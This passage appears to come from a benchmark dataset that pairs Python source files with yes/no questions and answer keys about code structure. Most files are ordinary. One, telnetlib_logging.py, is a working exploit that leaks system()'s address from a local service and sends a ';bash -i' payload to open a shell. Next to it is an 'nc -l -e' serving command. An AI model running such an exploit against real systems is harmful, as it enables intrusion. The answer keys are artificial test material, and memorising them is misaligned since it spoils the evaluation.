"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | the_grandest_step_of_them_all.py | sakurusurya2000/FOOBAR |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from photoCoordinates import photoCoordinates
from PIL import Image, ImageFont, ImageDraw
class photoImposer:
    """Draws per-position player stats onto special-teams formation images."""
    # Shared lookup of (x, y) text anchors per play type / position.
    pc = photoCoordinates()
    allCoordinates = pc.allCoordinates
    # Play type -> background formation image path (class-level, shared).
    all_images = {}

    def __init__(self):
        self.all_images['KICKOFF'] = "formationImages/kickoff_coverage.png"
        self.all_images['KICKOFF_RETURN'] = "formationImages/kickoff_return.png"
        self.all_images['PUNT'] = "formationImages/punt_coverage.png"
        self.all_images['PUNT_RETURN'] = "formationImages/punt_return.png"
        self.all_images['FIELDGOAL'] = "formationImages/fieldgoal_coverage.png"
        self.all_images['FIELDGOAL_BLOCK'] = "formationImages/fieldgoal_block.png"

    def imposeDataOnImage(self, playType, countsAndRatingsData, downloadPath):
        """Overlay player/count/rating text on the play-type image and save it.

        countsAndRatingsData: pandas-style frame with POSITION, PLAYER, COUNT
        and RATING columns (groupby/iterrows are used) — TODO confirm schema.
        """
        coordinates = self.allCoordinates.get(playType)
        image = Image.open(self.all_images.get(playType))
        font = ImageFont.truetype('arial_bold.ttf', size=13)
        draw = ImageDraw.Draw(image)
        for position, positional_group in countsAndRatingsData.groupby(['POSITION']):
            (x, y) = (0, 0)  # default anchor when the position has no coordinates
            if position in coordinates:
                (x, y) = coordinates.get(position)
            message = ''
            for index, player in positional_group.iterrows():
                message = message + str(player["PLAYER"]) + " " + str(player["COUNT"]) + " " + str(player["RATING"]) + '\n'
            color = 'rgb(0, 0, 0)'
            draw.text((x, y), message, fill=color, font=font)
        imagename = './' + downloadPath + '/' + playType + '_ANALYSIS.png'
        image.save(imagename)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherita... | 3 | backend/src/photoImposer.py | jayeshjakkani/American-Football-Analytics-Application |
from som.primitives.primitives import Primitives
from som.vmobjects.primitive import UnaryPrimitive
def _holder(rcvr):
    # Primitive body: return the receiver invokable's holder.
    return rcvr.get_holder()
def _signature(rcvr):
    # Primitive body: return the receiver invokable's signature.
    return rcvr.get_signature()
class InvokablePrimitivesBase(Primitives):
    """Installs the shared `holder` and `signature` primitives for invokables."""
    def install_primitives(self):
        self._install_instance_primitive(UnaryPrimitive("holder", self._universe, _holder))
        self._install_instance_primitive(UnaryPrimitive("signature", self._universe, _signature))
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | src/som/primitives/invokable_primitives.py | smarr/RPySOM |
import bpy
import bmesh
from bpy.props import *
from ... base_types import AnimationNode
class CreateBMeshFromMesh(bpy.types.Node, AnimationNode):
    """Animation node that converts mesh data into a BMesh."""
    bl_idname = "an_CreateBMeshFromMeshNode"
    bl_label = "Create BMesh"
    errorHandlingType = "EXCEPTION"

    def create(self):
        # One mesh input, one BMesh output.
        self.newInput("Mesh", "Mesh", "meshData")
        self.newOutput("BMesh", "BMesh", "bm")

    def execute(self, meshData):
        # Map low-level bmesh construction errors onto user-facing node errors.
        try:
            return getBMeshFromMesh(meshData)
        except IndexError as e:
            # An edge/polygon referenced a vertex index that does not exist.
            self.raiseErrorMessage("Missing vertices")
        except ValueError as e:
            self.raiseErrorMessage("Multiple identical edges or polygons")
def getBMeshFromMesh(meshData):
    """Build a bmesh.BMesh from mesh data (vertices, edges, polygons).

    Raises:
        IndexError: an edge or polygon references a vertex index that does
            not exist in meshData.vertices.
        ValueError: the same edge or polygon is defined more than once.
    """
    bm = bmesh.new()
    for co in meshData.vertices:
        bm.verts.new(co)
    # Blender >= 2.73 requires rebuilding the lookup table before indexing
    # bm.verts; older versions do not have the method at all, so only an
    # AttributeError is expected and tolerated here (was a bare `except`).
    try:
        bm.verts.ensure_lookup_table()
    except AttributeError:
        pass
    for edgeIndices in meshData.edges:
        bm.edges.new((bm.verts[edgeIndices[0]], bm.verts[edgeIndices[1]]))
    for polygonIndices in meshData.polygons:
        bm.faces.new(tuple(bm.verts[index] for index in polygonIndices))
    bm.normal_update()
    return bm
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"ans... | 3 | scripts/addons/animation_nodes/nodes/mesh/bmesh_create.py | Tilapiatsu/blender-custom_conf |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import sys, os
from pathlib import Path
import qlib
import fire
import pandas as pd
import ruamel.yaml as yaml
from qlib.config import C
from qlib.model.trainer import task_train
def get_path_list(path):
    """Normalize *path* to a list of paths.

    Parameters
    ----------
    path : str or iterable of str
        a single path or a collection of paths.

    Returns
    -------
    list
        ``[path]`` when given a string, otherwise ``list(path)``.
    """
    if isinstance(path, str):
        return [path]
    # Idiomatic replacement for the identity comprehension [p for p in path].
    return list(path)
def sys_config(config, config_path):
    """
    Configure the `sys` section: extend sys.path with the configured paths.

    Parameters
    ----------
    config : dict
        configuration of the workflow.
    config_path : str
        path of the configuration file (anchor for relative paths).
    """
    # Renamed from `sys_config` so the local no longer shadows this
    # function's own name.
    sys_section = config.get("sys", {})
    # Absolute paths are appended as-is.
    for p in get_path_list(sys_section.get("path", [])):
        sys.path.append(p)
    # Relative paths are resolved against the config file's directory.
    for p in get_path_list(sys_section.get("rel_path", [])):
        sys.path.append(str(Path(config_path).parent.resolve().absolute() / p))
# Workflow handler function.
def workflow(config_path, experiment_name="workflow", uri_folder="mlruns"):
    """Run a qlib task workflow described by a YAML config file.

    Parameters
    ----------
    config_path : str
        path of the YAML workflow configuration.
    experiment_name : str
        name under which the run is recorded.
    uri_folder : str
        folder (relative to the CWD) used as the experiment tracking URI.
    """
    with open(config_path) as fp:
        config = yaml.load(fp, Loader=yaml.SafeLoader)
    # Apply the config's `sys` section (extends sys.path).
    sys_config(config, config_path)
    # Point the experiment manager at a local tracking folder under the CWD.
    exp_manager = C["exp_manager"]
    exp_manager["kwargs"]["uri"] = "file:" + str(Path(os.getcwd()).resolve() / uri_folder)
    qlib.init(**config.get("qlib_init"), exp_manager=exp_manager)
    task_train(config.get("task"), experiment_name=experiment_name)
# function to run worklflow by config
def run():
    """Entry point: expose `workflow` on the command line via python-fire."""
    fire.Fire(workflow)
if __name__ == "__main__":
run()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | qlib/workflow/cli.py | GoooIce/qlib |
from .confirmacionMensaje import ConfirmacionMensaje
from .mensajeEnviado import MensajeEnviado
from .estadoMensaje import EstadoMensaje
class MensajeParcialmenteEnviado(EstadoMensaje):
    """State of a message delivered to only some of its receivers.

    External collaborators:
        confirmaciones: set of ConfirmacionMensaje already obtained.
        msg: the Mensaje this state belongs to.
    """

    def __init__(self, unMensaje, unConjDeConfirmaciones):
        # Defensive copy so outside mutations cannot alter this state.
        self.confirmaciones = set(unConjDeConfirmaciones)
        self.msg = unMensaje

    def puedeEliminarse(self):
        # A partially sent message cannot be deleted.
        return False

    def estaPendiente(self):
        # Still pending: some receivers have not gotten the message yet.
        return True

    def enviarSiPendiente(self, unMensajero):
        # Imported lazily to avoid circular imports between domain modules.
        from .campania import Campania
        from .mensaje import Mensaje
        from .grupo import Grupo
        receptores = self.msg.getCampania().getGrupoReceptores().getReceptores()
        for receptor in receptores:
            yaEnviado = False
            for conf in self.confirmaciones:
                if conf.getReceptor() == receptor:
                    yaEnviado = True
                    break
            if not yaEnviado:
                # BUGFIX: was `confirmaciones.add(...)`, a NameError — the
                # confirmation must be accumulated on the instance's set.
                self.confirmaciones.add(unMensajero.enviarMensajeA(self.msg, receptor))
        # All receivers confirmed: transition the message to "sent".
        # BUGFIX: was the undefined local `confirmaciones` here as well.
        self.msg.setEstado(MensajeEnviado(self.msg, self.confirmaciones))

    def getConfirmaciones(self):
        # Return a copy to preserve encapsulation.
        return set(self.confirmaciones)

    def __str__(self):
        # BUGFIX: __str__ must return a string, not the Mensaje object.
        return str(self.msg)
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | isw2-master/src/app/core/mensajeParcialmenteEnviado.py | marlanbar/academic-projects |
#!/usr/bin/env python3
import telnetlib
import struct
import logging
HOST="localhost"
#while true; do nc -l -p 1111 -e /tmp/vuln; done
old_write=telnetlib.Telnet.write
def write(self, str_: bytes):
    """Logging wrapper for Telnet.write: echo outgoing bytes, then send.

    Prints the decoded text when the payload is valid UTF-8, otherwise
    the raw bytes, then delegates to the original (pre-patch) method.
    """
    try:
        print("w: ",str_.decode("utf-8"))
    except UnicodeDecodeError:
        print("w: ",str_)
    # Delegate to the saved, unpatched Telnet.write.
    old_write(self,str_)
telnetlib.Telnet.write=write
old_read_until=telnetlib.Telnet.read_until
def read_until(self, *args, **kwargs):
    """Logging wrapper for Telnet.read_until: read, echo, return.

    Prints the decoded text when the data is valid UTF-8, otherwise the
    raw bytes; the received data is returned unchanged.
    """
    s=old_read_until(self,*args, **kwargs)
    try:
        print("r: ", s.decode("utf-8"))
    except UnicodeDecodeError:
        print("r: ",s)
    return s
telnetlib.Telnet.read_until=read_until
tn = telnetlib.Telnet(HOST,1111)
tn.read_until(match=b": ")
# Menu option 4 prints a help text that leaks an address
# (presumably of libc's system() — verify against the target binary).
tn.write(b"4\n")
help_txt=tn.read_until(match=b": ")
# Parse the hex address out of the help text: first line after the "- " marker.
system=help_txt.decode("utf-8").split("- ")[1].split("\n")[0]
system=int(system,16)
# Menu option 1 reaches the vulnerable input handler.
tn.write(b"1\n")
tn.read_until(match=b": ")
# Pack the leaked address as a 32-bit little-endian value and send the
# payload: shell command, NUL padding, then the packed address.
system=struct.pack("I",system)
tn.write(b";bash -i #\x00\x00\x00\x00"+system+b"\n")
print("enjoy the shell")
tn.interact()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fals... | 3 | random_stuff/telnetlib_logging.py | adw1n/competitive-programming |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
data = pd.read_csv("ex1data1.txt",names = ['population','profit'])
x = data.population
y = data.profit
"初始化,所有变量都是matrix"
df = data.copy()#因为insert会改变原数组,所以先复制一份,坑1.
df.insert(0,"one",1)
X = df.iloc[:,0:df.shape[1]-1]
y = df.iloc[:,df.shape[1]-1:df.shape[1]]#df.iloc[:,-1]是个一维数组(series),reshape(97,1)都不行,坑2.
theta = np.zeros(X.shape[1])
y = np.matrix(y)
X = np.matrix(X)
x = np.matrix(x)
x = x.T #行向量/列向量傻傻分不清 坑3
theta = np.matrix(theta)
H = X*(theta.T)
"""计算代价"""
def costfunction(X,y,H):
    """Mean squared error cost: sum((H - y)^2) / (2 * m)."""
    residuals = H - y
    squared = np.multiply(residuals, residuals)
    return np.sum(squared) / (2 * len(X))
"""批量梯度下降"""
alpha = 0.01  # learning rate
m = len(X)  # number of training examples
times = 1000  # gradient-descent iterations
def gradient_descent(theta,X,y,alpha,m,H,times):
    """Batch gradient descent for linear regression.

    Args:
        theta: 1 x n parameter row matrix (initial guess).
        X: m x n design matrix (first column of ones).
        y: m x 1 target column matrix.
        alpha: learning rate.
        m: number of training examples (== len(X)).
        H: initial hypothesis X * theta.T (m x 1).
        times: number of iterations.

    Returns:
        (final_theta, cost_history, theta0_history, theta1_history)
    """
    thetas_0 = [0]
    thetas_1 = [0]
    cost = [costfunction(X, y, H)]
    for i in range(times):
        H = X * theta.T
        erro = H - y
        # Vectorized simultaneous update of all parameters.
        # (Dead `temp = np.matrix([0,0])` initializer removed — it was
        # immediately overwritten.)
        temp = theta - erro.T * X * alpha / m
        thetas_0.append(temp[0, 0])
        thetas_1.append(temp[0, 1])
        theta = temp
        cost.append(costfunction(X, y, H))
    return theta, cost, thetas_0, thetas_1
final_theta,cost,thetas_0,thetas_1= gradient_descent(theta,X,y,alpha,m,H,times)
print(final_theta,'\n',cost,'\n',thetas_0,'\n',thetas_1)
"""绘图"""
fig,(ax1,ax2) = plt.subplots(2,1)
H = final_theta * X.T
H = H.T
ax1.plot(x,H,c = 'r',label = 'Prediction')
ax1.scatter(data.population,data.profit,label = 'data')
ax1.legend(loc = 2)
ax2.plot(cost)
ax1.set_xlabel('population')
ax1.set_ylabel('profit')
ax1.set_title('relationship between population and profit'.title())
ax2.set_xlabel('times')
ax2.set_ylabel('cost')
ax2.set_title('how does cost changed'.title())
fig.subplots_adjust(hspace = 0.8)
plt.show() | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | code-homework/ML/ex1_Linear Regression/ex1_batch.py | phww/Andrew.Ng-ML-Study |
# coding: utf-8
"""
Instagram API
The Instagram Private API in OpenAPI specs.v3.0 # noqa: E501
OpenAPI spec version: 0.0.1
GitHub repo: https://github.com/instagrambot/instagram-api-toolkit
"""
from __future__ import absolute_import
import unittest
import private_instagram_sdk
from JsonObject.clsJsonObject import JsonObject # noqa: E501
from private_instagram_sdk.rest import ApiException
class TestJsonObject(unittest.TestCase):
    """JsonObject unit test stubs (auto-generated skeleton)."""

    def setUp(self):
        # No fixtures required for these generated stubs.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testJsonObject(self):
        """Test JsonObject"""
        # FIXME: construct object with mandatory attributes with example values
        # model = private_instagram_sdk.models.clsJsonObject.JsonObject()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | sdks/python/test/test_JsonObject.py | pormes/pormes_bot17 |
# *** WARNING: this file was generated by the Kulado Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import kulado
import kulado.runtime
import warnings
from ... import tables, version
class PodTemplateList(kulado.CustomResource):
    """
    PodTemplateList is a list of PodTemplates.

    NOTE: generated code (see file header) — edit the codegen templates,
    not this class, for structural changes.
    """
    def __init__(self, resource_name, opts=None, items=None, metadata=None, __name__=None, __opts__=None):
        # __name__/__opts__ are deprecated aliases kept for backward
        # compatibility; they map onto resource_name/opts with a warning.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if not resource_name:
            raise TypeError('Missing resource name argument (for URN creation)')
        if not isinstance(resource_name, str):
            raise TypeError('Expected resource name to be a string')
        if opts and not isinstance(opts, kulado.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')

        # Fixed apiVersion/kind identify this Kubernetes resource type.
        __props__ = dict()

        __props__['apiVersion'] = 'v1'
        __props__['kind'] = 'PodTemplateList'
        if items is None:
            raise TypeError('Missing required property items')
        __props__['items'] = items
        __props__['metadata'] = metadata

        if opts is None:
            opts = kulado.ResourceOptions()
        if opts.version is None:
            opts.version = version.get_version()

        super(PodTemplateList, self).__init__(
            "kubernetes:core/v1:PodTemplateList",
            resource_name,
            __props__,
            opts)

    def translate_output_property(self, prop: str) -> str:
        """Map an engine-side property name to its Python (snake_case) form."""
        return tables._CASING_FORWARD_TABLE.get(prop) or prop

    def translate_input_property(self, prop: str) -> str:
        """Map a Python (snake_case) property name to its engine-side form."""
        return tables._CASING_BACKWARD_TABLE.get(prop) or prop
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cl... | 3 | sdk/python/pulumi_kubernetes/core/v1/PodTemplateList.py | kulado/kulado-kubernetes |
from multiprocessing import Pool
import argparse
import glob
import os
import io
import time
import logging
import gluonnlp as nlp
import tokenizer as tokenization
parser = argparse.ArgumentParser(description='BERT tokenizer')
parser.add_argument('--input_files', type=str, default='wiki_*.doc',
                    help='Input files. Default is "wiki_*.doc"')
parser.add_argument('--nworker', type=int, default=8,
                    help='Number of workers for parallel processing.')
# BUGFIX: parse_args() was called twice in a row; once is enough.
args = parser.parse_args()

# Expand the glob pattern into a deterministic, sorted list of inputs.
input_files = sorted(glob.glob(os.path.expanduser(args.input_files)))
num_files = len(input_files)
num_workers = args.nworker

logging.basicConfig(level=logging.INFO)
logging.info("Number of input files to process = %d"%(num_files))

# TODO(haibin) tokenize with vocab
# Lines matching these exactly are dropped from the output.
exclude_patterns = [
    '< no ##in ##cl ##ude >\n'
]
def in_pattern(x):
    """Return True when *x* exactly matches one of `exclude_patterns`.

    The original per-pattern length pre-check was redundant — string
    equality already implies equal length — so a plain membership test
    is equivalent and clearer.
    """
    return x in exclude_patterns
def f(input_file):
    """Filter one tokenized file: drop excluded patterns, keep doc breaks.

    Reads ``<name>.tokens`` and writes the filtered result to
    ``<name>.tks``. A blank line separates documents and is preserved;
    the first line of each document is consumed without being written
    (original behavior, preserved here).
    """
    # BUGFIX: the assertion message claimed '.doc' while the check is for
    # '.tokens'; also the input file was redundantly opened twice (an
    # outer `with` that only ran the assert, then a second open inside).
    assert input_file.endswith('.tokens'), 'Expects .tokens suffix for input files'
    with io.open(input_file, 'r', encoding="utf-8") as fin:
        lines = fin.readlines()
    with io.open(input_file.replace('.tokens', '.tks'), 'w', encoding="utf-8") as fout:
        new_doc = True
        for line in lines:
            if new_doc:
                # Skip the first line of a new document.
                new_doc = False
            elif len(line) == 1 and line[0] == '\n':
                # Blank line: document boundary, preserved in the output.
                new_doc = True
                fout.write(u'\n')
            elif in_pattern(line):
                # Excluded boilerplate pattern: drop.
                pass
            else:
                fout.write(line)
if __name__ == '__main__':
tic = time.time()
p = Pool(num_workers)
p.map(f, input_files)
toc = time.time()
logging.info("Processed %s in %.2f sec"%(args.input_files, toc-tic))
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | do_trim.py | eric-haibin-lin/text-proc |
"""AyudaEnPython: https://www.facebook.com/groups/ayudapython
# ------------------------ Enunciado Original -------------------------
Pedir al usuario la cantidad de números de la secuencia de Fibonacci
que desea ver.
Por ejemplo si el usuario digita 10, deberá mostrarse en pantalla la
secuencia:
1, 1, 2, 3, 5, 8, 13, 21, 34, 55
# ---------------------------------------------------------------------
NOTE: la secuencia para n = 10 es: 0, 1, 1, 2, 3, 5, 8, 13, 21, 34
"""
from unittest import main, TestCase
from typing import Generator, List
def fibonacci_while(n: int) -> Generator[int, None, None]:
    """Yield the first ``n`` Fibonacci numbers, starting from 0.

    :param n: how many elements to generate
    :return: generator over 0, 1, 1, 2, 3, 5, ...
    :rtype: Generator[int, None, None]
    """
    previous, current = 0, 1
    remaining = n
    while remaining > 0:
        yield previous
        previous, current = current, previous + current
        remaining -= 1
def fibonacci_for(n: int) -> List[int]:
    """Return the first ``n`` Fibonacci numbers, starting from 0.

    BUGFIX: the original unconditionally seeded the list with [0, 1], so
    n = 0 and n = 1 wrongly returned two elements. Edge cases are now
    handled explicitly; behavior for n >= 2 is unchanged.

    :param n: how many elements to return
    :return: list with the sequence 0, 1, 1, 2, 3, 5, ...
    :rtype: List[int]
    """
    if n <= 0:
        return []
    if n == 1:
        return [0]
    secuencia = [0, 1]
    for i in range(2, n):
        secuencia.append(secuencia[i - 1] + secuencia[i - 2])
    return secuencia
def main_():  # comment/uncomment to switch between while and for versions
    """Prompt for a count and print that many Fibonacci numbers."""
    n = int(input("Ingrese la cantidad de elementos de la secuencia: "))
    print(", ".join(str(x) for x in fibonacci_while(n)))
    #print(", ".join(str(x) for x in fibonacci_for(n)))
class Test(TestCase):
    """Checks both implementations against the canonical first-10 sequence."""

    def test_functions(self):
        for function in (fibonacci_while, fibonacci_for):
            self.assertEqual(list(function(10)), [0, 1, 1, 2, 3, 5, 8, 13, 21, 34])
if __name__ == "__main__":
# main() # uncomment this line and comment the next one to run the tests
main_() | [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | soluciones/serie_fibonacci.py | AyudaEnPython/Soluciones |
# coding: utf-8
"""
RadioManager
RadioManager # noqa: E501
OpenAPI spec version: 2.0
Contact: support@pluxbox.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import radiomanager_sdk
from radiomanager_sdk.models.station_result_station import StationResultStation # noqa: E501
from radiomanager_sdk.rest import ApiException
class TestStationResultStation(unittest.TestCase):
    """StationResultStation unit test stubs (auto-generated skeleton)."""

    def setUp(self):
        # No fixtures required for these generated stubs.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testStationResultStation(self):
        """Test StationResultStation"""
        # FIXME: construct object with mandatory attributes with example values
        # model = radiomanager_sdk.models.station_result_station.StationResultStation()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | test/test_station_result_station.py | Pluxbox/radiomanager-python-client |
import unittest
import pytest
import cupy
import cupyx
class TestSyncDetect(unittest.TestCase):
    """Tests for cupyx.allow_synchronize device-synchronization detection."""

    def test_disallowed(self):
        a = cupy.array([2, 3])
        # .get() copies device->host, which synchronizes and must raise.
        with cupyx.allow_synchronize(False):
            with pytest.raises(cupyx.DeviceSynchronized):
                a.get()

    def test_allowed(self):
        a = cupy.array([2, 3])
        with cupyx.allow_synchronize(True):
            a.get()

    def test_nested_disallowed(self):
        a = cupy.array([2, 3])
        # The innermost context wins: False inside True still raises.
        with cupyx.allow_synchronize(True):
            with cupyx.allow_synchronize(False):
                with pytest.raises(cupyx.DeviceSynchronized):
                    a.get()

    def test_nested_allowed(self):
        a = cupy.array([2, 3])
        # Innermost True re-allows synchronization inside a False scope.
        with cupyx.allow_synchronize(False):
            with cupyx.allow_synchronize(True):
                a.get()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | tests/cupy_tests/core_tests/test_syncdetect.py | svlandeg/cupy |
import os
import pandas as pd
import dill as pickle
from flask import Flask, jsonify, request
from utils import PreProcessing
app = Flask(__name__)
@app.route('/predict', methods=['POST'])
def apicall():
    """API Call
    Pandas dataframe (sent as a payload) from API Call
    """
    try:
        test_json = request.get_json()
        test = pd.read_json(test_json, orient='records')
        #To resolve the issue of TypeError: Cannot compare types 'ndarray(dtype=int64)' and 'str'
        test['Dependents'] = [str(x) for x in list(test['Dependents'])]
        #Getting the Loan_IDs separated out
        loan_ids = test['Loan_ID']
    except Exception as e:
        # Any payload/parsing problem is re-raised to Flask's error handling.
        raise e

    # Saved model artifact name (pickled with dill under ./models/).
    clf = 'model_v1.pk'

    if test.empty:
        # Empty payload -> 400 response.
        return(bad_request())
    else:
        #Load the saved model
        print("Loading the model...")
        loaded_model = None
        with open('./models/'+clf,'rb') as f:
            # dill is imported as `pickle` at module top; the artifact is
            # assumed to be a fitted sklearn-style pipeline — confirm.
            loaded_model = pickle.load(f)

        print("The model has been loaded...doing predictions now...")
        predictions = loaded_model.predict(test)
        """Add the predictions as Series to a new pandas dataframe
        OR
        Depending on the use-case, the entire test data appended with the new files
        """
        prediction_series = list(pd.Series(predictions))
        final_predictions = pd.DataFrame(list(zip(loan_ids, prediction_series)))
        """We can be as creative in sending the responses.
        But we need to send the response codes as well.
        """
        responses = jsonify(predictions=final_predictions.to_json(orient="records"))
        responses.status_code = 200

        return (responses)
@app.errorhandler(400)
def bad_request(error=None):
    """Return a JSON 400 response that points at the offending URL."""
    message = {
        'status': 400,
        'message': 'Bad Request: ' + request.url + '--> Please check your data payload...',
    }
    resp = jsonify(message)
    resp.status_code = 400

    return resp
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fal... | 3 | flask_api/server.py | pedrocarvalhodev/flask_api |
from bpy.types import Node
from arm.logicnode.arm_nodes import *
import arm.nodes_logic
class TestNode(Node, ArmLogicTreeNode):
    '''Test node: minimal pass-through logic node skeleton.'''
    bl_idname = 'LNTestNode'
    bl_label = 'Test'
    bl_icon = 'GAME'

    def init(self, context):
        # One action input and one action output.
        self.inputs.new('ArmNodeSocketAction', 'In')
        self.outputs.new('ArmNodeSocketAction', 'Out')
def register():
    """Register this add-on's custom logic nodes with Armory."""
    # Add custom nodes to the 'Action' category.
    add_node(TestNode, category='Action')
    # Rebuild Armory's node registry so the new nodes are picked up.
    arm.nodes_logic.register_nodes()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | dev_logicnode/Libraries/mynodes/blender.py | katharostech/armory_examples |
"""
Exception for errors raised by Basic Aer.
"""
from qiskit.exceptions import QiskitError
class C3QiskitError(QiskitError):
    """Base class for errors raised by C3 Qiskit Simulator."""

    def __init__(self, *message):
        """Set the error message.

        Message fragments are passed positionally and joined with spaces
        into self.message (each fragment must be a string).
        """
        super().__init__(*message)
        self.message = " ".join(message)

    def __str__(self):
        """Return the message."""
        return repr(self.message)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
}... | 3 | c3/qiskit/c3_exceptions.py | picbeats/c3 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Lightning Callbacks used when training."""
import os
from pytorch_lightning import callbacks
class TransformersModelCheckpoint(callbacks.ModelCheckpoint):
    """Saves model and tokenizer in Transformers format when ModelCheckpoint does save.

    This way it is possible to simply load the model (without training hparameters)
    using transformers.from_pretrained. Also adds an attribute .last_checkpoint_path.
    """

    def on_train_start(self, trainer, pl_module):
        # Capture the references _save_model needs later; assumes pl_module
        # exposes .model and .schema_tokenizer — confirm against the
        # LightningModule in use.
        super(TransformersModelCheckpoint, self).on_train_start(trainer, pl_module)
        self._model = pl_module.model
        self._tokenizer = pl_module.schema_tokenizer

    def _save_model(self, filepath):
        # Let Lightning write its own checkpoint first, then mirror the
        # model and tokenizer next to it in Transformers format.
        super(TransformersModelCheckpoint, self)._save_model(filepath)
        self.last_checkpoint_path = filepath
        save_path = os.path.dirname(filepath)
        self._model.save_pretrained(save_path)
        self._tokenizer.save(save_path)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (ex... | 3 | new_semantic_parsing/callbacks.py | nikhilgoel1997/new-semantic-parsing |
"""
Integration tests for __main__.py
"""
# pragma pylint: disable=redefined-outer-name
from click.testing import CliRunner
import pytest
from traveling_salesperson import __main__ as main
def test_main_runs(mocker, filename_fixture):
    """Ensures that main() runs smoothly over a test file."""
    # Spy (not stub) on each pipeline stage so the real code still runs.
    mock_etl = mocker.spy(main, 'etl')
    mock_distance = mocker.spy(main, 'distance_matrix')
    mock_path = mocker.spy(main, 'determine_path')
    mock_plot = mocker.spy(main, 'plot_path')

    # Test cli interface
    runner = CliRunner()
    result = runner.invoke(main.main, ['-f', filename_fixture])
    assert result.exit_code == 0

    # Each stage of the pipeline must have run exactly once.
    mock_etl.assert_called_once_with(filename_fixture)
    mock_distance.assert_called_once()
    mock_path.assert_called_once()
    mock_plot.assert_called_once()
@pytest.mark.parametrize('arg_list,error_code',
                         [(['-x', 'bad_arg'], 2),   # Command line error
                          (['-m', 'de-sitter'], 2), # Command line error
